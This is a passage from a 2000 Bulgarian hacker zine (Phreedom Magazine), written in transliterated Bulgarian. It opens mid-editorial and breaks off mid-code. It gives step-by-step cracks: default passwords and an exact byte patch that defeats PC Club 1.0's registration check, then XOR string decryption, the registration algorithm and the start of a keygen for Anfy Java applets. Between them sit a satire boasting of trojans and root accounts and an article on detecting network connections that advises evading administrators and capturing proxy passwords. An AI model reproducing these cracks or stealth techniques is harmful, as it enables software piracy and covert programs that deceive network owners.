cbor ot komplexite si). Drug kofti moment e, che Solar Eclipse me pomoli da
vklucha i info za GSM standarta, koeto syshto ne stana, zashtoto spored mene
e po-dobre, da ima otdelna i po-pulna statia za tova. I poslednoto, koeto
iskam da spomena, e edna kaka (neshto kato vdyhnovitelka), kojato ne se
znae, koga shte ja vidja pak, no i prashtam mnoooogo @}--'--,-.
*Tova e zavyrsheno v 2:55 ama tozi pyt PM.
Kuche
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Cracking PC CLub 1.0 (roden softuer za Game Clubs) By DaFixer
........... . . . . . . . . . . . . . .
I. Introduction
PCClub 1.0 se razprostraniava zaedno s oshte 2 shareware-ni programi s
diskovete na PC Mania. Sled instalaciata, suzdava direktoria s niakolko
exe-ta:
PCClubAdjust.exe - programka za adjust-vane na settings :)
PCClubMonitor.exe
PCClubRegister.exe - tova si lichi kakvo e i kakvo shte go pravim
PCClubReport.exe
PCClubScanner.exe
PCClubShell.exe - osnovniat modul - ne e Windows Shell, za razlika ot
ostanalite programi na diska - TimeShield i xTerminal
II. Required Utilities
W32DASM
SoftIce
Liubimiat vi HexEditor (Az polzvam Hex Workshop)
III. Applying the Sting
Oshte po vreme na instalaciata se zabeliazva, che "produktut" e pisan na
Delphi (po instaliraneto na BDE).
(Bel.Solar: Instalaciqta na BDE ne e garanciq che programata e pisana na
Deplhi. Borland Database Engine se poddurva ot Deplhi, C++ Builder i Borland
C++. Po dobur nachin za detectwane na kompilatora e da se pogledane w EXE-to
i da se potursqt identifikacionnite stringowe, koito wsichki kompilatori
ostawqt)
Sled kato instalaciata prikliuchi i se opitate da startirate niakoe ot
exe-tata za nastroika ili spravki se poiaviava "Kontrol-ut na dostupa" :))
E, edva li shte naluchkate parolata, no takava ima i dokolkoto se rovih iz
dokumentaciite nikude ne stana vupros za neia! Stana vupros obache za parola
za dostup do PCClubShell.exe. Shte vi spestia da se roveneto i shte vi
otkrehna, che parolata e "1" :).
Ta po vuprosa za "Kontrol-a na dostupa". Sled kato vidiah, che ima
parola, si otvorih BDEAdministrator-a, za da potursia alias. E, niamashe
takuv. Veroiatno programite sami si setvat alias-ite dinamichno in runtime.
Imashe obache edna osobenost - BDE-to na PCClub 1.0 be instalirano na
razlichno miasto ot C:\Program Files\Shared Files\Borland Shared\BDE.
Interesno...
Iasno e, che ne mogat da se zarediat 2 instance-a na 2 ednakvi dll-ki v
pametta :) Sled kato si otvorite BDEAdministrator-a i sled tova pusnete
niakoia ot programite na PC Club to... GRUM... E nishto osobeno de, prosto
vizhdate kak izglezhdat glavnite formi na programite. No nishto poveche...
"Unable to perform this operation on a closed data set" shte se poiavi ako
se opitate da napravite niakakvi promeni.
V posledstvie razbah, che parolite vsushtnost ne sa taina i sa "2", "3"
i "4". Vinagi sum mrazil da cheta otegchitelni help-ove :)). Ta tova za
nachalo.
Sled malko "vzirane" v PE32 header-a na failovete zabeliazvate nepriiatnoto:
UPX 0.82 Copyright (C) 1996-1999 Laszlo Molnar & Markus Oberhumer $..
$Id: NRV 0.61 Copyright (C) 1996-1999 Markus F.X.J. Oberhumer $..
$License: NRV for UPX is distributed under special license $..UPX!
Losho! Sled kato se porovite v Internet i namerite kakvo e UPX :
The Ultimate Packer for eXecutables
Copyright (c) 1996-1999 Markus Oberhumer & Laszlo Molnar
http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
http://www.nexus.hu/upx
Stava iasno, che si imame rabota s oshte edna programa za kriptirane na
PE. Mezhdu drugoto, v opisanieto na UPX mai pisheshe neshto po vuprosa, che
detect-va SoftIce i ako go nameri pravi nepriiatni neshta s PC-to vi. Taka
che iavno tova ne e reshenie.
Kato poprochetete malko poveche za UPX shte vidite edna interesna opcia
"d" - DECOMPRESS :))
He-He !!!
Vednaga kopirate upx.exe v direktoriiata na PCClub i pishete v DOS
Prompt velikolepnoto:
upx.exe -d PCClubShell.exe ....
Ultimate Packer for eXecutables
Copyright (C) 1996, 1997, 1998, 1999
UPX v0.84 Markus F.X.J. Oberhumer & Laszlo Molnar Oct 4th 1999
File size Ratio Format Name
------------------- ------ ----------- -----------
upx: PCClubShell.exe: CantUnpackException: not yet implemented
Unpacked 1 file: 0 ok, 1 error.
E tova e napravo vurhut!!! Ne si pravete truda da tursite decompress-ori
ot drugi avtori - prosto niama takiva :((
No sled po-vnimatelno vglezhdane zabeliazvate neshto osobeno interesno -
failut PCClubRegister.exe niama nepriatnoto UPX v header-a si! Tova veche
naistina e goliama nahodka. Opredeleno mi e interesno obache kakvo li tochno
e stanalo po vreme na "razrabotkata" na prilozhenieto ot Softuerna Grupa
Burgas, Bulgaria, che tozi fail e ostanal taka prenebregnat ot UPX-a !!! :))
Kakto i da e, veche imame za kakvo da se zahvanem - ami da zapochvame da
krakvame! :))
Sled kratko dizasemblirane s W32DASM 8.9 poluchavame zhelania kod. Ako
startirate programata PCClubRegister.exe mozhe da se zabelezhi slednia
prozorec:
Interesno shto za UNIKALEN NOMER NA PRODUKTA :) E vse pak potursih iz
resursite na exe-to dali puk sluchaino go niama vuprosniat nomer
"587064175", no ne go namerih. Za smetka na tova obache namerih interesnia
resurs "C:\"!!! Sled burz pregled na importnatite metodi vednaga mi napravi
vpechatlinie importa:
KERNEL32!GetVolumeInformationA
Vednaga go potursih iz koda i stignah do:
* Possible StringData Ref from Code Obj ->"C:\"
|
:0044595F 687C594400 push 0044597C
// Opredeleno kato parametur se podava "C:\"
* Reference To: kernel32.GetVolumeInformationA, Ord:0000h
|
:00445964 E8FF03FCFF call 00405D68
:00445969 85C0 test eax, eax
// Proveriava dali funkciiata e succeed-nala
:0044596B 7505 jne 00445972
:0044596D 83C8FF or eax, FFFFFFFF
:00445970 EB03 jmp 00445975
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0044596B(C)
|
:00445972 8B0424 mov eax, dword ptr [esp]
// Premestva Volume Serial Number v EAX
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00445970(U)
|
:00445975 81C414010000 add esp, 00000114
// ESP veche ne sochi nishto polezno
(Bel.Iron - vsushtnost unishtozhava stack frame-a)
:0044597B C3 ret
// Vrushta se ot CALL-a
E veche neshtata sa iasni. Vednaga si zaredih SoftIce-a i si bpx-nah
KERNEL32!GetVolumeInformationA.
Okaza se, che proverkata na serinia nomer na diska se pravi 2 puti. Edin
put pri inicializaciata na programata, za da presmetne unikalnia nomer, i
oshte edin put pri proverkata dali ste Good Guy ili ste Bad Cracker :)
Sled startiraneto vuvedoh niakakuv idiotski nomer, naprimer "fuck off" i
natisnah butona za registrirane. SoftIce-a podskochi na
KERNEL32!GetVolumeInformationA, a sled izlizane ot kernel32.dll s F11 se
vurnah v koda na PCClubRegister.exe.
Prosledih kakvo stava natatuk. Tam sledvashe slednatna uzhasna procedura
po presmiatane na "UNIKALNIA NOMER NA PRODUKTA " i registracionnia kod:
:00445653 E8E4020000 call 0044593C
// Tuk se vrushtame sled opredelianeto na nomera na hard-a v EAX
:00445658 8BD8 mov ebx, eax
:0044565A 8D55F4 lea edx, dword ptr [ebp-0C]
:0044565D 8BC3 mov eax, ebx
............................................................................
Tuk sledvat bezumno slozhnite smetki :))
E, vse pak niama da pishem Key Generator, taka che shte gi propusnem :)
............................................................................
:0044575A E809E4FBFF call 00403B68
// I sled dulgite muki stigame do edin CALL
// na procedurka, koiato pravi vuprosnata
// proverka
:0044575F 742B je 0044578C
// I sushtestvenia vupros:
// Suvpadat li deistvitelniia
// nomer na hard-a s presmetnatiia ot
// reg. koda. I ako
// ne suvpadat produlzhavame s
:00445761 6A00 push 00000000
............................................................................
:00445787 E9B2000000 jmp 0044583E
// I okonchatelno sled redica nepriiatni
// procedurki
// stigame do bye-bye jump-a
Inache shtiahme da stignem do kude po-dobri neshta .....
E ako prosto smenim uslovniia skok
:0044575F 742B je 0044578C
// predviden samo za dobrite "kupuvachi"
S bezuslovniia:
:0044575F EB2B jmp 0044578C
// za vsichki, koito iskat da si registrirat
// PCClub 1.0
shte stignem do kraia!!!
IV. Conclusion
E, ako imate zhelanie, mozhete da razuchite "slozhnite smetki" i da si
spretnete edin KeyGenerator, no spored men ne si struva mukite. Edva li
tochno tazi programa zasluzhava chak takova vnimanie :))
A ako vse pak smiatate, che tia mozhe da vi e polezna... ami kupete si ia:
28 lv/br za ot 1 do 10 licenza
25 lv/br za poveche ot 11 licenza
Ili podmenete 74 s EB na fizicheski adres 44B57, sled koeto si pusnete
novoto PCClubRegister.exe i napishete kakvoto pozhelaete za registracionen
kod :) Shte budete pozdraveni za uspeshnoto regisrirane na produkta.
DaFixer
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
O B E S H T A N I E
pred drugarq ManiaX Killerian
........... . . . . . . . . . . . . . .
ot rabotnicite, invenerite i sluvashtite ot hakerskite grupi, obedineniq
i mestni organizacii w stranata
Lybimi nash drugariu ManiaX,
S chustwo na radost i zadowolstwo Wi dokladwame, che w rezultat na
blagorodnoto hakersko surewnowanie i sistemnoto izpolzwane na bogatiq
amerikanski i suwetski opit s chest ustoqhme dadenoto pred Was obeshtanie za
predsrochno izpulnenie na hakerskite planowe za 1999 godina. Kolektiwite na
44 hakerski sdruveniq izpulniha godishniq si plan za po-malko ot 10 meseca,
a 42 grupi - za po-malko ot 11 meseca, kato: zawod "Star Gruhtar", DIP
"Solar Eclipse", "Kay" i drugi.
S izpulnenieto na dadenoto pred Was obeshtanie za 1999 godina nasheto
narodno stopanstwo poluchi ot hakerskite promishleni predpriqtiq
swruhplanowo 3053 root-ski accounta. Preizpulnen be planut za snivenie
sebestojnostta na produkciqta i bqha realizirani 23853 bajta ikonomii. W
izpylnenie ukazaniqta na CK na PHM za podobrenie kachestwoto na produkciqta
w hakerskite grupi sega rabotqt 283 brigadi za otlichno kachestwo, a 159
hakeri poluchiha sobstwen kachestwen shtempel. Wse po-shiroka i uspeshno se
prilaga pochinut na stahanowcite-udarnici CuMeoHoB i Guninski za snivenie
sebestojnostta na prdukciqta pri wsqka proizwodstwena operaciq. Wuw
fabrikata "EXo" za shest meseca sa realizirani 23 swruhplanowi trojanci.
Prez 1999 godina bqha postignati znachitelni uspehi w podobrenie
bitowite uslowiq na hakerite w stranata. Za kulturni i blagoustrojstweni
meropriqtiq w sliwenskiq i sofijskiq zatwor bqha izrazhodwani nad 6538782
lewa.
Wsepreslawni drugary ManiaX,
Wduhnoweni ot postignatite uspehi prez izteklata godina, rukowodeni ot
nashata slawna komu^H^H^H^Hhakerska partiq, polzwajki bogatiq opit na
amerikanskite i nashite stahanowci, nie dawame pred Was, pred Partiqta i
naroda slednite obeshtaniq za predsrochno izpulnenie na plana za 2000 godina
i za izpylnenie na petiletkata za 4 godini:
Da izpulnim proizwodstweniq plan 105.7 na sto.
Da uwelichim proizwoditelnosta na truda s 8.8 na sto swruh plana.
Da preminat prez kursowe za kwalifikaciq 2083 hakeri.
Da dadem pyrwokachestwena produkciq 85 na sto ot cqloto proizwodstwo pri
zaplanuwano 75 na sto.
Da preizpulnim normata za sreden denonoshten probeg da bqgashtite ot
chengetata s 2.5 na sto.
Da izwozim i metnem 2000 typi sysadmini poweche ot zaplanuwanoto.
Da uwelichim asortimenta na exploitite, programite i ishlemeto s 20 na
sto nad plana.
Skupi drugary ManiaX,
Opirajki se na bogatiq opit ot borbata za izpulenie na obeshtaniqta prez
1999 godina, werni na Washite ukazaniq da ne se uspokoqwame s postignatite
uspehi, shte napregnem wsichkite si sili za osigurqwane na now podem w
hakwaneto i crackwaneto, za uspeshno izpulnenie na dadenite pred Was
obeshtaniq. S towa nie shte dadem na narodnoto stopanstwo swruhplanowa
produkciq ot 31337 trojanci i 73313 exploiti. Ot snivenie na sebestojnosta
na produkciqta shte realizirame 644 GB ikonomii. Za razi cel nie shte
prowedem oshte po uporita i nastojchiwa borba za po-natatushno podobrenie
organizaciqta na truda i proizwodstwoto, za ukrepwane na trduwata i durvawna
disciplina. Shte zasilim borbata za dobro i otlichno kachestwo na
produkciqta. Shte zasilim razprostranenieto na opita na nowatorite w
proizwodstwoto i shte podobrim kwalifikaciqta na rabotnicite. Shte wnedrim
shiroko metoda na inv. Guninski w nashata rabota. Shte powedem i oshte
po-nastojchiwa borba za po-natatushno razshirqwane i wnedrqwane w
proizwodstwoto metoda na Jon Johanson i Muhanow. Po primera na Alan Cox i
Linus Torvalds ot Kupawinskata fabrika - Helzinki, shte razgrushtame
blagorodno hakersko surewnowanie za neprekusnato razkriwane na dopulnitelni
rezerwi i nowi wuzmovnosti za ikonomii. Zastwajki na boewi post za
interesnite na Rodinata protiw nejnite wytreshni i wunshni wragowe, hakerite
ot proizwodstwenite predpriqtiq i branshoweite organizacii ne shte povalqt
silite si za da prewurnat w viwo delo dadenite pred Was obeshtaniq.
Da viweqt nashite stahanowci, purwenci i nowatori w proizwodstwoto!
Da viwee nashata rukowoditelka i wduhnowitelka w borbata za mir i
hacktivism - slawnata PHM nachelo s generalniq sekretar na Partiqta
drugarq EXo!
Da prebude bulgaro-tajwanskata druvba - izworut na nashite pobedi w
stroitelstwoto na personalni elektronno-izchislitelni mashini, garanciq
za nezawisimostta i swobodata na nashata Rodina!
Da viwee nashiq Wovd i Uchitel - wduhnowitelqt na cqloto progresiwno
chowechestwo w borbata mu za mir i socializum - welikiqt ManiaX
Killerian!
Obeshtanieto e obsudeno i prieto na obshto subranie na rabotnicite,
invinerite, tehnicheskiq personal i sluvashtite ot hakerskite grupi,
obedineniq i mestni organizacii w stranata.
6 February 2000
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Detecting InterNet Connections By ManiaX Killerian
........... . . . . . . . . . . . . . .
Statiq na tazi tema imashe i v PhM20, no tam tq beshe orientirana
osnovno kum Windows, i ne pokrivashe nqkolko interesni sluchaq, kato VPN
naprimer. Tazi statiq e poveche teoritichno orientirana i s malko primeri.
Vuzmozhnite fizicheski mrezhovi vruzki na edma mashina za nashite celi
mogat da se razdelqt na 2 vida - Dial-UP ( normalen dial-up, callback i
t.n.) i LAN vruzka ( Ethernet i t.n.). Po-chesto sreshtanoto e dial-up-a, no
i vtoriqt variant ne e za propuskane poradi vuzmozhnostite si - kato
naprimer po-burza vruzka, t.nar. 'shared' sreda, koqto dava neveroqtna
vuzmozhnost za sniffing.
Fakticheski, tipovete vruzka koito mogat da se sreshtat, sa slednite:
I. VPN vruzka.
I.1. VPN vruzka bez nikakva vruzka kum Internet.
I.2. VPN vruzka s nqkakva vuzmozhnost za vruzka kum Internet.
I.2.1. S direkten gateway.
I.2.1.1 Filtirirana.
I.2.1.2 Nefilrirana.
I.2.2. Prez masq.
I.2.2.1 Filtirirana.
I.2.2.2 Nefilrirana.
I.2.3. Sus socks/proxy.
I.2.4. Sus firewall s parola.
II. ISP vruzka
II.1. ISP vruzka kum normalen provider, bez nqkakvi filtri.
II.2. ISP vruzka prez masq.
II.3. ISP vruzka sus filtrirane na chast ot trafika.
II.4. ISP vurzka s propuskane na chast ot trafika.
Osnovnata razlika m/u VPN i ISP vruzkite e tazi, che pri purvite se
obrushta mnogo po-golqmo vnimanie na sigurnostta i e mnogo po-vuzmozhno da
se sledi trafika na potrebitelq, i po tozi nachin proverkata za Internet
connection da predupredi administratorite na mrezhata za vuzmozhnostta da
ima neshto, koeto te ne biha haresali. Za tova sum razdelili I.2. i II -
inache te ne se razlichavat mnogo.
Vuzmozhnite metodi za otkrivane na vruzka mogat da se razdelqt v 3
kategorii - pasivi, 'stealth' i aktivni. Purvqt metod vkluchva proverka na
nastrojkite na samata lokalna sistema, vtoriqt izpolzva mrezhova aktivnost,
koqto e prakticheski neotlichima ot normalnata, a tretiqt vkluchva mrezhova
aktivnost, koqto vuv VPN bi se otlichavala ot ostanalata i programata bi
stanala lesno otkrivaema i drazneshta za administratorite.
Tuk iskam da otdelq malko vreme, za da obqsnq zashto ima nuzhda ot
podobna statiq - zashtoto povecheto otkrivaniq na interenet vruzka sa zle
napisani i samo generirat nenuzhen i draznesht trafik, kojto edinstveno
mozhe da poprechi na mrezhovite administratori na nqkoe VPN, koeto ima
striktni pravila za trafika i logva vseki paket, kojto ne se podchinqva na
tezi pravila. Eto taka naprimer, predstavete si che ste napisali naprimer
Napster server, kojto kogato ima connection se vkluchva i se announce-va
kudeto trqbva. I che nqkoj, kojto izpolzva komputera si i za vruzka do
firmata si, si go instalira - v takuv sluchaj vuv firmata vse nqkoga shte
oburnat vnimanie na nenuzhniq trafik kojto se generira, shte se vdigne shum,
i chovekut shte mahne programata - neshto koeto bi moglo da se izbegne, ako
prosto se otkriva koe e istinski internet connection i koe ne e.
I taka,neka zapochnem s
_PASIVNITE METODI_
Tezi metodi ne generirat nikakuv mrezhov trafik, i za momenta sa
naj-izpolzvani. Purviqt takuv metod e da se proverqva tablicata s
interfejsite na mashinata, i da se tursi takuv, chiito IP address ne e
127.0.0.1 - koeto donqkude e pravilno, no ne reshava celiq problem,
zashtoto e prednaznacheno za sluchai ot tipa I.2.1. , I.2.2. , II.1. i II.2.
Druga vuzmozhnost e da se proveri dali ima default route prez nqkoj ot tezi
interfejsi - tova sushto vurshi dobra rabota, no samo za sluchaq kogato
mashinata e na LAN, kojto ne e svurzan kum InterNet, i izpolzva nqkakuv drug
variant - naprimer dial-up - za vruzka.
Proverkata za tova dokolko e realna vruzka kum Inet, kato se gleda dali
IP adresa e realen, sushto ne pokriva vsichki sluchai - izpuska vruzkite ot
tipa I.2.2. i II.2.
Mnogo polezen, no i mnogo truden za osushtestvqvane metod za pasiven
detect e tozi s preglezhdane na sistemnata configuraciq i sledene na
potrebitelq - zadadeni socks-ove, zadadeni mailbox-ove i t.n. , chrez koito
da se opredeli v koi momenti sushtestvuva connection kato se nabludavat
dejstviqta na potrebitelq - naprimer kogato browse-va, da se zapishe prez
koj connection e svurzan i kak. Problemut tuk se poqvqva ot tova, che e
mnogo trudno (a mozhe bi i nevuzmozhno) da se opredeli tochno koga
potrebitelq browse-va Inet i koga - nqkoj vutreshen site. Vuzmozhno e
naprimer da se proverqva dali ne poseshtava poveche ot 3-4 korenno razlichni
site-ove, razlichavashti se po purvoto chislo na IP adres-a, no tuk veche
stigame do analiz na potrebitelq, koeto e dosta slozhna oblast. Zatova neka
produlzhim sus
_STEALTH METODITE_
Tezi metodi sa mnogo po-tochni ot pasivnite, i mogat da pokriqt mnogo
seriozna chast ot vuzmozhnostite. Tqhnoto prilozhenie idva sled tova na
pasivnite - t.e. sled kato e otrkita nqkakva vruzka, chrez tezi nachini s
dosta dobra tochnost mozhe da se opredeli ot koj vid e vruzkata.
Edin takuv nachin e da se vzeme ot sistemnata configuraciq DNS servera i
da se prati zaqvka kum nego (izpolzvajki UDP socket, ne standartnite
funkcii) za NS serverite za nqkolko domain-a - naprimer mtv.com, uu.net,
internic.net - neshta, za koito e qsno che shte gi ima dokato ima net :) .
Ako servera vurne nqkakuv polozhitelen otgovor, to veche mozhem da sme
sigurni na pone 95 % che imame vruzka kum internet. Sushto taka mozhem da
proverim za rabotesht socks ili proxy server ( na baza na localnata
konfiguraciq) koito da mogat da se izpolzvat za nashite celi. Sushto taka,
mozhe da se opita da se otvori proizvolna stranica prez localno zadadenoto
proxy - naprimer www.msn.com - koeto pravi vseki Inet explorer po default,
ili puk home.netscape.com. Mozhe susto taka da se prihvane parolata za
proxy-to/firewall-a (tova mozhe bi trqbva da vleze v pasivnite metodi) i da
se izpolzva pak - no tova izlaga programata na risk ot detectvane (ako e
nqkoj troqnec naprimer).
I posledni ostavat
_AKTIVNITE METODI_
Tezi metodi sa naj-lesno otkrivaemite, no i garantirat naj-golqma
tochnost, i sushto taka s tqh mozhem da proverim dali vruzkata koqto imame
mozhe da ni svurshi rabota. Naprimer, ako iskame da izpratim poshta, mozhem
da opitame da se svurzhem direktno sus SMTP servera si i da proverim dali
stava ili ne stava vruzkata. Sushto taka mozhem da opitame i da pusnem ping
kum nqkoj server kojto garantirano otgovarq ( kato www.mtv.com, kojto e
lubim na EXo za taq cel, ili www.internic.net). Sushto taka mozhe da se
probva connect do 2-3 site-a (az v tezi sluchai vinagi predpochitam
root-servers.net) po 53ti port, kojto nikoga ne se filtira, i da se vidi
dali se osushtestvqva vruzkata.
Vmesto zakluchenie moga da kazha, che nito edin ot tezi metodi ne e
perfekten. Za celite na vsqka programa mogat da se kombinirat po nqkolko ot
tezi metodi i da se postiga optimalen rezultata ot gledna tochka na
generiran trafik / istinnost / nezabelezhimost.
_SOURCES_
Slednite sourceowe demonstrirat nqkoi ot opisanite metodi.
-- interface_num.sh - Proverqva dali ima poveche ot edin UP interface ------
#!/bin/bash
if [ `/sbin/ip link |grep UP |wc -l` -gt 1 ] ; then
echo More than one interface UP.
exit 0
else
echo Only loopback exists.
exit 1
fi
-- default_route.sh - Proverqva dali ima default route ---------------------
#!/bin/bash
if /sbin/ip route |grep default > /dev/null ; then
echo Exists default route.
exit 0
else
echo No default route present.
exit 1
fi
-- dns_test.sh - Pravi DNS test za daden domain ----------------------------
#!/bin/bash
#
if [ -z $1 ] ; then
echo Usage: $0 domain
exit 2
fi
if dnsquery $1. NS 1>/dev/null 2>/dev/null ; then
echo Test successful
exit 0
else
echo Test failed
exit 1
fi
Za ostanalite metodi ima sushtestvuvashti komandi:
telnet - za proverka za tova dali mozhe da se otvori connection (v
povecheto sluchai se preporuchva da se polzvat netcat ili socket za
scriptove)
ping i fping - da se proverqva dali mozhe da se ping-ne nqkoq mashina.
Scriptovete mogat po zhelanie lesno da budat dopulneni taka, che da
proverqvat dokolko se minava prez masq i t.n. Sushto taka chast ot
scriptovete iziskvat komandata 'ip' ot iproute paketa.
ManiaX Killerian
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Cracking Java Applets By Solar Eclipse
........... . . . . . . . . . . . . . .
Java e edin dosta interesen ezik. Malcina sa se zanimawali s nego, no
kato koncepciq Java e edin mnogo interesen ezik. Osnownata razlika mevdu
konvencionalinte ezici i Java e towa che Java se kompilira do t.n. byte-code
i sled towa se izpulnqwa ot interpretator (t.n. Java Virtual Machine). Byte
coda (narichan oshte P-code) sudurva cqlata informaciq za programata, s
izkluchenie na symbol tablicite. Towa pozwolqwa pulna dekompilaciq na Java
programite, koeto ot swoq strana ulesnqwa izkluchitelno mnogo rabotata na
crackerite.
W tazi statiq shte se zanimaq s crackwaneto na Java appletite na
AnfyTeam. Na adres www.anfyteam.com movete da swalite bezplatni versii na
appletite i da gi izpolzwate za dobawqne na gotini efekti wuw washata
web-stranica. Za suvalenie bezplatanata wersiq na appletite ima edno mnogo
wavno ogranichenie - pri click wurhu appleta se poqwqwa suobshtenie che towa
e neregisrirana versiq na Anfy. Powecheto web designeri shte iskat da
izpolzwat appletite kato interactivni linkowe, taka che tozi nag-screen e
mnogo draznesht.
W statiqta si shte izhovdam ot poziciqta na cracker, imasht opit s Win32
sharewarki, no napulno nezapoznat s Java. Kogato se hwanah da krakwam Anfy,
ne bqh imal nikakuw predishen doseg s Java.
Step 1: First look
Appletite sa arhivirani w ZIP file. Sled razarhiwiraneto mu poluchawame
appletite w otdelni direktorii, zaedno s dokumentaciq. Ot dokumentaciqta
nauchawame che appletite sa napulno funkcionalni i nag-free kogato se puskat
ot localniq hard disk. Towa zwuchi dobre - znachi nqkude w sourca trqbwa da
ima kod, koito prowerqwa ot kude se puska appleta. Sushto taka w
dokumentaciqta pishe che sled registraciqta shte poluchim registracionen
kod, koito shte e swurzan s imeto na domaina ni. Tozi kod se podawa kato
parametur w <APPLET> taga w HTML-to. Towa sushto zwuchi dobre - koda e
baziran na domaina i movem da si napishem keygen.
Dobre e da imame nqkakuw validen kod, za da movem da go widim kak
izglevda. Na stranicata na AnfyTeam imashe demonstracii na appletite, i te
nqmaha nag-screenowe. Dali Anfy imat kod? Da, i toi izglevda taka:
<param name=regcode value="fskdyjfr-htrdijmgmkp">
Step 2: Decompiling
Wreme e da decompilirame appleta. Sled kratka razhodka po web-a namirame
freeware Java decompiler, koito se kazwa Jad. Upotrebata mu e lesna - jad
<filename> dekompilira Java appleta sus zadadenoto ime. Poluchawa se .JAD
file, koito sudurva sourca na Java appleta. Tozi source e w obshti linii e
rabotesht Java source i move da se kompilira s Java kompilatora.
Neka razgledame sourca na appleta BookFlip:
// Decompiled by Jad v1.5.7a. Copyright 1997-99 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/SiliconValley/Bridge/8617/jad.html
// Decompiler options: packimports(3)
// Source File Name: bookflip.java
...
Interesnoto e che w sourca lipswat kakwito i da e ASCII stringowe.
Copyright messageto, koeto appleta pokazwa sushto go nqma. Towa e stranno i
trqbwa da bude proucheno. Na mnogo mesta w sourca namirame slednita
konstrukcii:
if(!s1.startsWith(c("\031%\004c<\0364\004ssx\026\017o\177;<F2k/\"H{r>")))
...
s2 = c("><\n\177");
...
if(s2.equalsIgnoreCase(c("><\n\177")) || s3.length() == 0 ||
s3.equalsIgnoreCase(c("4:\005{p0:\025n")) || s3.equals(c("igQ4,veH+")))
Ochewidno decompilatora izpolzwa promenliwi s ime S za stringowe. Tezi
stranni stringowe w sourca izglevdat XOR-nati. Qwno c() e funkciq koqto gi
XOR-wa ili prawi neshto podobno.
Neka razgledame funkciqta c(): (btw, Java-ta e mnogo blizka do C++ i
sourca ne bi trqbwalo da wi suzdade problemi, dori da ne ste programirali
nikoga na Java)
private static String c(String s1)
{
char ac[] = s1.toCharArray();
int i1 = ac.length;
int j1 = 0;
label0:
do
{
int k1 = 0;
ac[j1] ^= 'X';
do
{
j1++;
k1++;
if(i1 != j1)
switch(k1)
{
case 1: // '\001'
ac[j1] ^= 'U';
break;
case 2: // '\002'
ac[j1] ^= 'f';
break;
case 3: // '\003'
ac[j1] ^= '\032';
break;
case 4: // '\004'
ac[j1] ^= '\034';
break;
case 5: // '\005'
continue label0;
}
else
return new String(ac);
} while(true);
} while(true);
}
Sled kratuk ogled stigame do izwoda che tozi kod e mrusen, gaden XOR-er
s wurtene na key-a. (operatora ^= osushtestwqwa XOR-wane). Tochniq analiz na
algorituma ne e truden, no shte ni izgubi wremeto - nqma smisul ot nego.
Mnogo po lesno e prosto da si napishem edna malka programka na Java, w koqto
da paste-nem funkciqta c().
Step 3: keyc.java
Za celta e neobhodimo da swalim JDK (Java Development Kit) ot sun.com.
Tutoriali po Java ima mnogo, taka che napiswaneto na programka, koqto da
izwikwa funkciq i da printwa rezultata na ekrana ne e trudno. Eto sourca:
-- keyc.java ---------------------------------------------------------------
class KeycApp {
private static String c(String s1)
{
char ac[] = s1.toCharArray();
int i1 = ac.length;
int j1 = 0;
label0:
do
{
int k1 = 0;
ac[j1] ^= 'X';
do
{
j1++;
k1++;
if(i1 != j1)
switch(k1)
{
case 1: // '\001'
ac[j1] ^= 'U';
break;
case 2: // '\002'
ac[j1] ^= 'f';
break;
case 3: // '\003'
ac[j1] ^= '\032';
break;
case 4: // '\004'
ac[j1] ^= '\034';
break;
case 5: // '\005'
continue label0;
}
else
return new String(ac);
} while(true);
} while(true);
}
public static void main(String[] args) {
System.out.println(c("\031%\026vy,u\004c<\0364\004ssx\026\017o\177;<F2k/\"H{r>"));
}
----------------------------------------------------------------------------
Kakto wivdate, powecheto ot sourca e prosto copy-paste ot Java appleta
koito crackwame. Kato argument na funkciqta c() movem da podadem wseki edin
string ot appleta i da widim decryptiranata mu forma.
Towa znachitelno ulesnqwa razuchawaneto na source koda na Anfy.
Prowerkata na regcode-a se izwurshwa wuw funkcqita init().
Step 4: public void init()
W nachaloto na funkciqta init() se namira sledniq kod:
s2 = getDocumentBase().getProtocol();
s3 = getDocumentBase().getHost();
if(s2.equalsIgnoreCase(c("http:")) || s3.length() == 0 ||
s3.equalsIgnoreCase(c("localhost")) || s3.equals(c("127.0.0.1")))
{
bc = true;
} else
{
...
}
Ochewidno tuk se izwurshwa prowerka dali appleta se stratira ot
localnata machina. Po-kusno appleta prowerqwa flaga bc za da widi dali da
pokave nag-screena ili ne.
Ako appleta ne e startiran ot localnata machina, registracionniq kod se
prochita ot spisuka s parametrite i se prowerqwa za korektnost.
s4 = getParameter(c("regcode"));
Sled towa registriraniq domain name se extractwa ot regcoda i se
srawnqwa s istinskiq domain.
Step 5: The Algorithm
Analiza na algorithma za regcoda e skuchna zadacha. Trqbwa wi list,
moliw i print-out na source koda.
Osnowniq element na algorithma e neshto mnogo podobno na ROT13.
Simwolite ot domain-a se izmestwat s N pozicii, kato N warira.
Pseudocode:
1) Ako domaina zapochwa s 'www.', otrqzwat se purwite 4 bukwi.
2) Izchislqwa se sumata na wsichki chetni bukwi i se zapazwa w evensum
3) Izchislqwa se sumata na wsichki nechetni bukwi i se zapazwa w oddsum
4) Dulvinata na domain-a se mod-wa s 7, rezultata se zapazwa w mod7
5) Dulvinata na domain-a se mod-wa s 3, rezultata se zapazwa w mod3
6) Bukwite s ASCII kodowe ot 48 do 57 se izmestwat s mod7 simwola nadqsno
7) Bukwite s ASCII kodowe ot 65 do 90 se izmestwat s mod7 simwola nadqsno
8) Bukwite s ASCII kodowe ot 97 do 122 se izmestwat s mod7 simwola nadqsno
9) Bukwite s ASCII kodowe 45 i 46 se razmenqt (45->46 i 46->45)
10) Sled wsqka bukwa mod7 = mod7 + mod3 i ako mod7 e po golqmo ot 7, mod7 se prawi 1
Regcoda se sustoi ot izmestenite bukwi na domaina, '-', evensum i
oddsum. Evensum i oddsum se konvertirat w 4 simwolni decimal chisla i se
izmestwat nadqsno. Evensum se izmestwa s 52, oddsum s 55.
Source code:
void __fastcall TForm1::Button1Click(TObject *Sender)
{
char cbuf[1000];
char *ac = &cbuf[0];
int c, i, len, oddsum=0, evensum=0;
strncpy(ac, aedit->Text.c_str(), 1000);
